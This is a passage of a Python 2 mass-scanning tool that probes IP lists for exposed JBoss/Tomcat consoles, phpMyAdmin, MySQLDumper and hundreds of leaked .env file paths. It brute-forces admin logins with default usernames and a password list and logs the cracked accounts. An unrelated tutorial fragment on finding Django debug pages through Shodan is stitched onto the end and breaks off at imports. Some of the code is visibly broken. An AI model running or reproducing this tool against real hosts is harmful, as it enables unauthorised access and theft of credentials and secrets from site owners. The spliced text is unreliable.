__info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: tpwdx = tpwd.strip() if tools().http_basic_auth(target_url, tadmin, tpwdx)[0] == True: result_line += " Account:" + tadmin + "/" + tpwdx print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwdx tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwdx else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx3(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx3_secured.txt", 
"log_usec_result_file" : "log_jmx3_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx3.txt", "log_bruted_result_file" : "log_jmx3_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", 
"/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = open('passwords_unix.txt', 'r').read().splitlines() main_url = tools().create_http_url(ip, port, file = "", prot = "http") for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host 
down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: if tools().http_basic_auth(target_url, tadmin, tpwd)[0] == True: result_line += " Account:" + tadmin + "/" + tpwd print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwd tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwd else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) def module_scan_mysqldumper(self, ip, port): ############################################################# # Scan Hosts for installed MySQLDumper and log them ############################################################# __info__ = {"name" : "mysqldumper", "log_usec_result_file" : "usec_result_msd.txt", "log_sec_result_file" : "sec_results_msd.txt", "log_unknwn_result_file" : "unknwn_results_msd.txt", "paths" : ["/Dumper", "/MSD", "/MySQL", "/MySQLDumper", "/dumper", "/msd", "/msd1.24.4", "/msd1.24stable", "/mySQLDumper", "/mySQLmanager", "/mySqlDumper", "/mysql", "/mysqldumper", "/sql", "/sqladmin", "/sqlmanager", "/sqlweb", 
"/websql"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("<title>MySQLDumper</title>") != -1: print "[*] MSD (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] MSD (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_phpmyadmin(self, ip, port): ############################################################# # Scan Hosts for phpmyadmin and log them ############################################################# __info__ = {"name" : "phpmyadmin", "log_usec_result_file" : "usec_result_pma.txt", "log_sec_result_file" : "sec_results_pma.txt", "log_unknwn_result_file" : "unknwn_results_pma.txt", "paths" : ["/phpmyadmin", "/phpMyAdmin", "/mysql", "/sql", "/myadmin", "/phpMyAdmin-4.2.1-all-languages", "/phpMyAdmin-4.2.1-english", "/xampp/phpmyadmin", "/typo3/phpmyadmin", "/webadmin"], "mark_usec" : ["<li id=\"li_server_info\">Server: ", "src=\"navigation.php", "src=\"main.php"], "mark_sec" : ["www.phpmyadmin.net", "input_username", "pma_username", "pma_password", "src=\"main.php?token="], "mark_blacklist" : ["<?php", "<?"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured #print target_return[3] # Check with k not in ... 
mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['mark_usec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) elif any(k in target_return[3] for k in __info__['mark_sec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) else: print "[*] PMA (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_sqlitemanager(self, ip, port): ############################################################# # Scan for sqlitemanager and log them ############################################################# __info__ = {"name" : "sqlitemanager", "log_result_file" : "log_sqlitemanager.txt", "log_unknwn_result_file" : "unknwn_results_sqlitemanager.txt", "paths" : ["/sqlite", "/SQLite/SQLiteManager-1.2.4", "/SQLiteManager-1.2.4", "/sqlitemanager", "/SQlite", "/SQLiteManager"], "marks" : ["Create or add new database", "<h2 class=\"sqlmVersion\">Welcome to", "http://www.sqlitemanager.org"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/main.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[1] == 200: result_line = "%s Server: %s" %(target_url, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): sys.stdout.write("[*] Sqlitemanager: %s\n" %target_url) tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], 
result_line) def module_scan_webdav(self, ip, port): ############################################################# # Scan for webdav and log them ############################################################# __info__ = {"name" : "webdav", "log_result_file" : "log_webdav.txt", "log_unknwn_result_file" : "unknwn_results_webdav.txt", "paths" : ["/webdav"], "mark_xampp" : ["<b>WebDAV testpage</b>"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: if any(k in target_return[3] for k in __info__['mark_xampp']): print "[*] WebDAV (TRUE):", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] WebDAV (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_laravel(self, ip, port): ############################################################# #Scan for laravel by [email protected]@R-LightS ############################################################# __info__ = {"name" : "laravel", "log_result_file" : "log_laravel.txt", "log_unknwn_result_file" : "unknwn_results_laravel.txt", "paths" : [ "/.env", "/__tests__/test-become/.env", "/_static/.env", "/.c9/metadata/environment/.env", "/.docker/.env", "/.docker/laravel/app/.env", "/.env.backup", "/.env.dev", "/.env.development.local", 
"/.env.docker.dev", "/.env.example", "/.env.local", "/.env.php", "/.env.prod", "/.env.production.local", "/.env.sample.php", "/.env.save", "/.env.stage", "/.env.test", "/.env.test.local", "/.env~", "/.gitlab-ci/.env", "/.vscode/.env", "/3-sequelize/final/.env", "/07-accessing-data/begin/vue-heroes/.env", "/07-accessing-data/end/vue-heroes/.env", "/08-routing/begin/vue-heroes/.env", "/08-routing/end/vue-heroes/.env", "/09-managing-state/begin/vue-heroes/.env", "/09-managing-state/end/vue-heroes/.env", "/31_structure_tests/.env", "/acme_challenges/.env", "/acme-challenge/.env", "/acme/.env", "/actions-server/.env", "/admin-app/.env", "/admin/.env", "/adminer/.env", "/administrator/.env", "/agora/.env", "/alpha/.env", "/anaconda/.env", "/api/.env", "/api/src/.env", "/app_dir/.env", "/app_nginx_static_path/.env", "/app-order-client/.env", "/app/.env", "/app/client/.env", "/app/code/community/Nosto/Tagging/.env", "/app/config/.env", "/app/config/dev/.env", "/app/frontend/.env", "/app1-static/.env", "/app2-static/.env", "/apps/.env", "/apps/client/.env", "/Archipel/.env", "/asset_img/.env", "/assets/.env", "/Assignment3/.env", "/Assignment4/.env", "/audio/.env", "/awstats/.env", "/babel-plugin-dotenv/test/fixtures/as-alias/.env", "/babel-plugin-dotenv/test/fixtures/default/.env", "/babel-plugin-dotenv/test/fixtures/dev-env/.env", "/babel-plugin-dotenv/test/fixtures/empty-values/.env", "/babel-plugin-dotenv/test/fixtures/filename/.env", "/babel-plugin-dotenv/test/fixtures/override-value/.env", "/babel-plugin-dotenv/test/fixtures/prod-env/.env", "/back-end/app/.env", "/back/.env", "/backend/.env", "/backend/src/.env", "/backendfinaltest/.env", "/backup/.env", "/base_dir/.env", "/basic-network/.env", "/bgoldd/.env", "/bitcoind/.env", "/blankon/.env", "/blob/.env", "/blog/.env", "/blue/.env", "/bookchain-client/.env", "/bootstrap/.env", "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env", "/boxes/oracle-vagrant-boxes/Kubernetes/.env", 
"/boxes/oracle-vagrant-boxes/OLCNE/.env", "/bucoffea/.env", "/build/.env", "/cardea/backend/.env", "/cdw-backend/.env", "/cgi-bin/.env", "/ch2-mytodo/.env", "/ch6-mytodo/.env", "/ch6a-mytodo/.env", "/ch7-mytodo/.env", "/ch7a-mytodo/.env", "/ch8-mytodo/.env", "/ch8a-mytodo/.env", "/ch8b-mytodo/.env", "/Chai/.env", "/challenge/.env", "/challenges/.env", "/charts/liveObjects/.env", "/chat-client/.env", "/chiminey/.env", "/client-app/.env", "/client/.env", "/client/mutual-fund-app/.env", "/client/src/.env", "/ClientApp/.env", "/clld_dir/.env", "/cmd/testdata/expected/dot_env/.env", "/code/api/.env", "/code/web/.env", "/CodeGolf.Web/ClientApp/.env", "/codenames-frontend/.env", "/collab-connect-web-application/server/.env", "/collected_static/.env", "/community/.env", "/conf/.env", "/config/.env", "/ContainerRegistry/.env", "/content/.env", "/core/.env", "/core/app/.env", "/core/Datavase/.env", "/core/persistence/.env", "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env", "/counterblockd/.env", "/counterwallet/.env", "/cp/.env", "/cron/.env", "/cronlab/.env", "/cryo_project/.env", "/css/.env", "/custom/.env", "/d/.env", "/data/.env", "/database/.env", "/dataset1/.env", "/dataset2/.env", "/default/.env", "/delivery/.env", "/demo-app/.env", "/demo/.env", "/deploy/.env", "/developerslv/.env", "/development/.env", "/directories/.env", "/dist/.env", "/django_project_path/.env", "/django-blog/.env", "/django/.env", "/doc/.env", "/docker-compose/platform/.env", "/docker-elk/.env", "/docker-network-healthcheck/.env", "/docker-node-mongo-redis/.env", "/docker/.env", "/docker/app/.env", "/docker/compose/withMongo/.env", "/docker/compose/withPostgres/.env", "/docker/database/.env", "/docker/db/.env", "/docker/examples/compose/.env", "/docker/postgres/.env", "/docker/webdav/.env", "/docs/.env", "/dodoswap-client/.env", "/dotfiles/.env", "/download/.env", "/downloads/.env", "/e2e/.env", "/en/.env", "/engine/.env", "/env/.env", "/env/dockers/mariadb-test/.env", 
"/env/dockers/php-apache/.env", "/env/example/.env", "/env/template/.env", "/environments/local/.env", "/environments/production/.env", "/error/.env", "/errors/.env", "/example/.env", "/example02-golang-package/import-underscore/.env", "/example27-how-to-load-env/sample01/.env", "/example27-how-to-load-env/sample02/.env", "/examples/.env", "/examples/01-simple-model/.env", "/examples/02-complex-example/.env", "/examples/03-one-to-many-relationship/.env", "/examples/04-many-to-many-relationship/.env", "/examples/05-migrations/.env", "/examples/06-base-service/.env", "/examples/07-feature-flags/.env", "/examples/08-performance/.env", "/examples/09-production/.env", "/examples/10-subscriptions/.env", "/examples/11-transactions/.env", "/examples/drupal-separate-services/.env", "/examples/react-dashboard/backend/.env", "/examples/sdl-first/.env", "/examples/sdl-first/prisma/.env", "/examples/vue-dashboard/backend/.env", "/examples/web/.env", "/examples/with-cookie-auth-fauna/.env", "/examples/with-dotenv/.env", "/examples/with-firebase-authentication-serverless/.env", "/examples/with-react-relay-network-modern/.env", "/examples/with-relay-modern/.env", "/examples/with-universal-configuration-build-time/.env", "/exapi/.env", "/Exercise.Frontend/.env", "/Exercise.Frontend/train/.env", "/export/.env", "/fastlane/.env", "/favicons/.env", "/favs/.env", "/FE/huey/.env", "/fedex/.env", "/fhir-api/.env", "/files/.env", "/fileserver/.env", "/films/.env", "/Final_Project/Airflow_Dag/.env", "/Final_Project/kafka_twitter/.env", "/Final_Project/StartingFile/.env", "/finalVersion/lcomernbootcamp/projbackend/.env", "/FIRST_CONFIG/.env", "/first-network/.env", "/fisdom/fisdom/.env", "/fixtures/blocks/.env", "/fixtures/fiber-debugger/.env", "/fixtures/flight/.env", "/fixtures/kitchensink/.env", "/flask_test_uploads/.env", "/fm/.env", "/font-icons/.env", "/fonts/.env", "/front-app/.env", "/front-empathy/.env", "/front-end/.env", "/front/.env", "/front/src/.env", "/frontend/.env", 
"/frontend/momentum-fe/.env", "/frontend/react/.env", "/frontend/vue/.env", "/frontendfinaltest/.env", "/ftp/.env", "/ftpmaster/.env", "/gists/cache", "/gists/laravel", "/gists/pusher", "/github-connect/.env", "/grems-api/.env", "/grems-frontend/.env", "/Hash/.env", "/hasura/.env", "/Helmetjs/.env", "/hgs-static/.env", "/higlass-website/.env", "/home/.env", "/horde/.env", "/hotpot-app-frontend/.env", "/htdocs/.env", "/html/.env", "/http/.env", "/httpboot/.env", "/HUNIV_migration/.env", "/icon/.env", "/icons/.env", "/ikiwiki/.env", "/image_data/.env", "/Imagebord/.env", "/images/.env", "/img/.env", "/install/.env", "/InstantCV/server/.env", "/items/.env", "/javascript/.env", "/js-plugin/.env", "/js/.env", "/jsrelay/.env", "/jupyter/.env", "/khanlinks/.env", "/kibana/.env", "/kodenames-server/.env", "/kolab-syncroton/.env", "/Kubernetes/.env", "/lab/.env", "/laravel/.env", "/latest/.env", "/layout/.env", "/lcomernbootcamp/projbackend/.env", "/leafer-app/.env", "/ledger_sync/.env", "/legacy/tests/9.1.1", "/legacy/tests/9.2.0", "/legal/.env", "/lemonldap-ng-doc/.env", "/lemonldap-ng-fr-doc/.env", "/letsencrypt/.env", "/lib/.env", "/Library/.env", "/libs/.env", "/linux/.env", "/local/.env", "/log/.env", "/logging/.env", "/login/.env", "/mail/.env", "/mailinabox/.env", "/mailman/.env", "/main_user/.env", "/main/.env", "/manual/.env", "/master/.env", "/media/.env", "/memcached/.env", "/mentorg-lava-docker/.env", "/micro-app-react-communication/.env", "/micro-app-react/.env", "/mindsweeper/gui/.env", "/minified/.env", "/misc/.env", "/Modix/ClientApp/.env", "/monerod/.env", "/mongodb/config/dev/.env", "/monitoring/compose/.env", "/moodledata/.env", "/msks/.env", "/munki_repo/.env", "/music/.env", "/MyRentals.Web/ClientApp/.env", "/name/.env", "/new-js/.env", "/news-app/.env", "/nginx-server/.env", "/nginx/.env", "/niffler-frontend/.env", "/node_modules/.env", "/Nodejs-Projects/play-ground/login/.env", "/Nodejs-Projects/play-ground/ManageUserRoles/.env", "/noVNC/.env", 
"/Nuke.App.Ui/.env", "/oldsanta/.env", "/ops/vagrant/.env", "/option/.env", "/orientdb-client/.env", "/outputs/.env", "/owncloud/.env", "/packages/api/.env", "/packages/app/.env", "/packages/client/.env", "/packages/frontend/.env", "/packages/plugin-analytics/src/fixtures/analytics-ga-key/.env", "/packages/plugin-qiankun/examples/app1/.env", "/packages/plugin-qiankun/examples/app2/.env", "/packages/plugin-qiankun/examples/app3/.env", "/packages/plugin-qiankun/examples/master/.env", "/packages/react-scripts/fixtures/kitchensink/template/.env", "/packages/styled-ui-docs/.env", "/packages/web/.env", "/packed/.env", "/page-editor/.env", "/parity/.env", "/Passportjs/.env", "/patchwork/.env", "/path/.env", "/pfbe/.env", "/pictures/.env", "/playground/.env", "/plugin_static/.env", "/post-deployment/.vscode/.env", "/postfixadmin/.env", "/price_hawk_client/.env", "/prisma/.env", "/private/.env", "/processor/.env", "/prod/.env", "/projbackend/.env", "/project_root/.env", "/psnlink/.env", "/pt2/countries/src/.env", "/pt8/library-backend-gql/.env", "/pub/.env", "/public_html/.env", "/public_root/.env", "/public/.env", "/question2/.env", "/qv-frontend/.env", "/rabbitmq-cluster/.env", "/rails-api/react-app/.env", "/rasax/.env", "/react_todo/.env", "/redmine/.env", "/repo/.env", "/repos/.env", "/repository/.env", "/resources/.env", "/resources/docker/.env", "/resources/docker/mysql/.env", "/resources/docker/phpmyadmin/.env", "/resources/docker/rabbitmq/.env", "/resources/docker/rediscommander/.env", "/resourcesync/.env", "/rest/.env", "/restapi/.env", "/results/.env", "/robots/.env", "/root/.env", "/rosterBack/.env", "/roundcube/.env", "/roundcubemail/.env", "/routes/.env", "/run/.env", "/rust-backend/.env", "/rust-backend/dao/.env", "/s-with-me-front/.env", "/saas/.env", "/samples/chatroom/chatroom-spa/.env", "/samples/docker/deploymentscripts/.env", "/script/.env", "/scripts/.env", "/scripts/fvt/.env", "/selfish-darling-backend/.env", "/Serve_time_server/.env", 
"/serve-browserbench/.env", "/Server_with_db/.env", "/server/.env", "/server/config/.env", "/server/laravel/.env", "/server/src/persistence/.env", "/services/adminer/.env", "/services/deployment-agent/.env", "/services/documents/.env", "/services/graylog/.env", "/services/jaeger/.env", "/services/minio/.env", "/services/monitoring/.env", "/services/portainer/.env", "/services/redis-commander/.env", "/services/registry/.env", "/services/simcore/.env", "/services/traefik/.env", "/sessions/.env", "/shared/.env", "/shibboleth/.env", "/shop/.env", "/Simple_server/.env", "/site-library/.env", "/site/.env", "/sitemaps/.env", "/sites/.env", "/sitestatic/.env", "/Socketio/.env", "/sources/.env", "/Sources/API/.env", "/spearmint/.env", "/spikes/config-material-app/.env", "/SpotiApps/.env", "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env", "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env", "/src/__tests__/__fixtures__/typeScriptProject/.env", "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env", "/src/.env", "/src/add-auth/express/.env", "/src/assembly/.env", "/src/character-service/.env", "/src/client/mobile/.env", "/src/core/tests/dotenv-files/.env", "/src/gameprovider-service/.env", "/src/main/front-end/.env", "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env", "/src/renderer/.env", "/srv6_controller/controller/.env", "/srv6_controller/examples/.env", "/srv6_controller/node-manager/.env", "/st-js-be-2020-movies-two/.env", "/stackato-pkg/.env", "/static_prod/.env", "/static_root/.env", "/static_user/.env", "/static-collected/.env", "/static-html/.env", "/static-root/.env", "/static/.env", "/staticfiles/.env", "/stats/.env", "/storage/.env", "/style/.env", "/styles/.env", "/stylesheets/.env", "/symfony/.env", "/system-config/.env", "/system/.env", "/target/.env", "/temanr9/.env", "/temanr10/.env", "/temp/.env", "/template/.env", "/templates/.env", "/test-network/.env", 
"/test-network/addOrg3/.env", "/test/.env", "/test/aries-js-worker/fixtures/.env", "/test/bdd/fixtures/adapter-rest/.env", "/test/bdd/fixtures/agent-rest/.env", "/test/bdd/fixtures/couchdb/.env", "/test/bdd/fixtures/demo/.env", "/test/bdd/fixtures/demo/openapi/.env", "/test/bdd/fixtures/did-method-rest/.env", "/test/bdd/fixtures/did-rest/.env", "/test/bdd/fixtures/edv-rest/.env", "/test/bdd/fixtures/openapi-demo/.env", "/test/bdd/fixtures/sidetree-mock/.env", "/test/bdd/fixtures/universalresolver/.env", "/test/bdd/fixtures/vc-rest/.env", "/test/fixtures/.env", "/test/fixtures/app_types/node/.env", "/test/fixtures/app_types/rails/.env", "/test/fixtures/node_path/.env", "/test/integration/env-config/app/.env", "/testfiles/.env", "/testing/docker/.env", "/tests/.env", "/Tests/Application/.env", "/tests/default_settings/v7.0/.env", "/tests/default_settings/v8.0/.env", "/tests/default_settings/v9.0/.env", "/tests/default_settings/v10.0/.env", "/tests/default_settings/v11.0/.env", "/tests/default_settings/v12.0/.env", "/tests/default_settings/v13.0/.env", "/tests/drupal-test/.env", "/tests/Integration/Environment/.env", "/tests/todo-react/.env", "/testwork_json/.env", "/theme_static/.env", "/theme/.env", "/thumb/.env", "/thumbs/.env", "/tiedostot/.env", "/tmp/.env", "/tools/.env", "/Travel_form/.env", "/ts/prime/.env", "/ubuntu/.env", "/ui/.env", "/unixtime/.env", "/unsplash-downloader/.env", "/upfiles/.env", "/upload/.env", "/uploads/.env", "/urlmem-app/.env", "/User_info/.env", "/v1/.env", "/v2/.env", "/var/backup/.env", "/vendor/.env", "/vendor/github.com/gobuffalo/envy/.env", "/vendor/github.com/subosito/gotenv/.env", "/videos/.env", "/vm-docker-compose/.env", "/vod_installer/.env", "/vue_CRM/.env", "/vue-end/vue-til/.env", "/vue/vuecli/.env", "/web-dist/.env", "/web/.env", "/Web/siteMariage/.env", "/webroot_path/.env", "/websocket/.env", "/webstatic/.env", "/webui/.env", "/well-known/.env", "/whturk/.env", "/windows/tests/9.2.x/.env", "/windows/tests/9.3.x/.env", 
"/wp-content/.env", "/www-data/.env", "/www/.env", "/xx-final/vue-heroes/.env", "/zmusic-frontend/.env"], "marks" : ["Laravel", "laravel", "https://laravel.com/", "https://laracon.eu/online/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] laravel:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) class main(): """ Main part which controls the complete program """ def __init__(self, file, timeout = 10): self.file = read_file_ip(file) global scan scan = scan(timeout) def run(self, threads): threads = int(threads) print "\n" print "[INFO] Scanning with %s Thread(s)\n" %threads while True: line = self.file.next_line() if line == False: break while True: if threading.active_count() <= threads: ip_port = line.split(":") if(re.match("((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)",ip_port[0]) != None): ip = ip_port[0] port = ip_port[1].split(" ")[0] t = threading.Thread(target=scan.check, args=(ip, port)) t.deamon = False t.start() break else: break return True if __name__ == "__main__": __version__ = "by FXP-T Team - www.fxp-terminal.info" def help(): print "--------------------------------------------------------------------" print " Schm3ckm0-Ch3ck3R v0.5 " print "- .py <file> results.txt <threads> [timeout] " print "-- *** " print "- Respect to: " print " " print "- ddr, b2r, bwc, il, maro, burnz, chucky, " print "- gil, bebop, Gnu, airy, fake, " print "- dodo, mani, Buster and all i foget 
:D " print "-- *** " print "- " print "- Respect to: " print "- FXP-T Team, [email protected]@R-LightS and Friends, moep, izibitzi, Stylez " print " " print " < Changelog > " print " " print " " print " " print " " print " 28.01.2021 - SSLError Fix , True, False and None , durch getestet " print "-18.01.2021 - diverse path erweiterungen------------------------- " print "-18.01.2021 - module_scan_laravel_and_phpunit hinzugefügt-------- " print "-01.10.2020 - Adminer modul hinzugefügt-------------------------- " print " 03.10.2020 - Scan module erweitert------------------------------ " print " 28.02.2020 - Bug Fixes, Brute Module eing...-------------------- " print " 01.10.2020 - Bug Fixes und kleib tests durchgefürt " print "--------------------------------------------------------------------" if len(sys.argv) == 3: main = main(sys.argv[1]) main.run(sys.argv[2]) elif len(sys.argv) == 4: main = main(sys.argv[1], timeout = sys.argv[3]) main.run(sys.argv[2]) else: help()
  2. Let’s install the shodan module by executing the following command.

    pip install shodan

    import shodan

    SHODAN_API_KEY = "YOUR_SHODAN_API"
    api = shodan.Shodan(SHODAN_API_KEY)

    # One domain per line in the wordlist; every match is written out as a URL.
    with open("bug-bounty-wordlist.txt", "r") as words, \
         open("django-debug-list.txt", "w") as django_debug_list:
        for word in words.readlines():
            query = "html:'URLconf defined' ssl:" + word.strip('\n')
            try:
                results = api.search(query)
                print('Results found: {}'.format(results['total']))
                for result in results['matches']:
                    print(word)
                    print('IP: {}'.format(result['ip_str']))
                    port = result['port']
                    # Build the URL from the port Shodan reported.
                    if port in [80, 443]:
                        if port == 443:
                            ip = "https://" + result['ip_str']
                        else:
                            ip = "http://" + result['ip_str']
                    else:
                        ip = "http://" + result['ip_str'] + ":" + str(port)
                    django_debug_list.write(ip + '\n')
                    print('')
            except Exception as e:
                print(e)

This shodan Python module is an official wrapper around the Shodan API. We can use all the filters specified in the Shodan docs via this module. You need to get an API key at shodan.io by creating an account. Every year in November, as a Black Friday offer, Shodan provides a member account for $5. You can afford it.

In the above program, we open a domain wordlist file, iterate over it in a loop, and construct the Shodan query for each entry. The query is passed to the Shodan search API function, which returns the matches as a list of dictionaries. You can check each IP address manually, or you can automate that process as well.

Okay, let’s automate:

    import re
    import requests

